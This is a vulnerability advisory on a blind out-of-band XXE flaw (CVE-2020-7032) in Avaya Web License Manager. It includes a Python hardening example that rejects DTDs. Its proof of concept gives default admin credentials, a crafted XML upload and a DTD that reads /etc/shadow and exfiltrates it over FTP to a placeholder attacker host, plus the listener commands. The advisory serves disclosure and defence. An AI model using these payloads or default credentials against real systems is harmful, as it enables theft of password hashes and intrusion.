Vendor Description
“As a global leader in delivering superior communications experiences, Avaya provides the most complete portfolio of software and services for multi-touch contact center and unified communications offered on premises, in the cloud, or a hybrid. Today’s digital world centers on communications enablement, and no other company is better positioned to do this than Avaya.”
Source: https://www.avaya.com/en/
Business Recommendation
The vendor provides a patch for the Avaya Web License Manager which should be installed immediately.
SEC Consult recommends performing a thorough security review, conducted by security professionals, to identify and resolve all security issues.
Vulnerability Overview / Description
Blind Out-Of-Band XML External Entity Injection (CVE-2020-7032)
This vulnerability in the Avaya Web License Manager (WebLM) allows an authenticated user to read arbitrary files in the context of the web server (Tomcat) by uploading a specially crafted XML file through the license upload functionality. Examples of sensitive files that can be read this way are /etc/shadow, SSH keys and other configuration files.
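The root cause of this vulnerability class is an XML parser that resolves entities declared in a DTD supplied by the uploader. As an added example, not code from Avaya or from this advisory, the following Python function shows the hardening a license-upload parser needs: it refuses any DOCTYPE, entity declaration or external entity reference before the parser can expand them, which is the same approach the defusedxml library takes. WebLM itself runs in Java on Tomcat; the equivalent there is to set the parser feature http://apache.org/xml/features/disallow-doctype-decl to true, and the pattern carries over unchanged. The sample license document and the crafted upload it is tested against are constructed here, with example.invalid standing in for the attacker host the advisory calls $ATTACKER_IP.

```python
import xml.parsers.expat


class ForbiddenXml(ValueError):
    """Raised when an untrusted document carries a DTD or entity declaration."""


def parse_untrusted_xml(data: bytes) -> list:
    """Parse XML from an untrusted source (e.g. a license upload) and return
    the element names in document order.

    Any DOCTYPE, entity declaration or external entity reference aborts the
    parse with ForbiddenXml, so neither internal nor external entities are
    ever expanded. Malformed XML raises xml.parsers.expat.ExpatError.
    """
    parser = xml.parsers.expat.ParserCreate()

    def reject(*_args):
        # Expat re-raises exceptions thrown by handlers out of Parse().
        raise ForbiddenXml("DTD / entity declarations are not allowed in uploads")

    # A DOCTYPE is the only place a DTD can come from, so rejecting it at
    # the start of the declaration stops every entity trick at once. The
    # other two hooks are belt and braces for parsers configured differently.
    parser.StartDoctypeDeclHandler = reject
    parser.EntityDeclHandler = reject
    parser.ExternalEntityRefHandler = reject

    seen = []
    parser.StartElementHandler = lambda name, _attrs: seen.append(name)
    parser.Parse(data, True)
    return seen


def is_safe_upload(data: bytes) -> bool:
    """True only if the document parses without any DTD; an upload handler
    would call this before passing the data to the real license parser."""
    try:
        parse_untrusted_xml(data)
    except (ForbiddenXml, xml.parsers.expat.ExpatError):
        return False
    return True


# Constructed sample: a benign license-style document (hypothetical schema).
BENIGN_LICENSE = (
    b'<?xml version="1.0"?>'
    b'<license><product>WebLM</product><feature name="agents" count="5"/></license>'
)

# Constructed sample shaped like the crafted upload described in the advisory;
# the host is a placeholder, not an attacker address.
OOB_XXE_UPLOAD = (
    b'<?xml version="1.0" ?>'
    b'<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://example.invalid/xxe_file.dtd"> %asd; %c; ]>'
    b'<a>&rrr;</a>'
)

# Constructed sample: an internal-only entity, also refused because the
# DOCTYPE itself is rejected.
INTERNAL_ENTITY = b'<!DOCTYPE a [<!ENTITY x "y">]><a>&x;</a>'


if __name__ == "__main__":
    print("benign:", is_safe_upload(BENIGN_LICENSE), parse_untrusted_xml(BENIGN_LICENSE))
    print("oob xxe:", is_safe_upload(OOB_XXE_UPLOAD))
    print("internal entity:", is_safe_upload(INTERNAL_ENTITY))
```

Rejecting the DOCTYPE outright, rather than trying to whitelist "harmless" entities, is the choice to make for a file-upload endpoint: license files have no legitimate need for a DTD, and a missing DOCTYPE also removes entity-expansion denial of service from the attack surface.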
Proof Of Concept
Blind Out-Of-Band XML External Entity Injection (CVE-2020-7032)
Log in as a user at $IP/WebLM/ and navigate to “Install License”. If WebLM has never been used before or has not been hardened, the default credentials are admin:weblmadmin.
Create an XML file like the following:
<?xml version="1.0" ?>
<!DOCTYPE a [
  <!ENTITY % asd SYSTEM "http://$ATTACKER_IP/xxe_file.dtd">
  %asd;
  %c;
]>
<a>&rrr;</a>
and a DTD file like:
<!ENTITY % d SYSTEM "file:///etc/shadow">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://$ATTACKER_IP:2121/%d;'>">
Start a web server, e.g. SimpleHTTPServer:
python -m SimpleHTTPServer 80
and an FTP server like the Go XXE FTP server:
./xxeserv 2121
Upload the crafted XML file by clicking the install button.
Vulnerable / Tested Versions
The following version has been tested:
- Avaya Web License Manager 6.3
The vendor does not support versions below 7.x. Probably all versions below 7 are affected.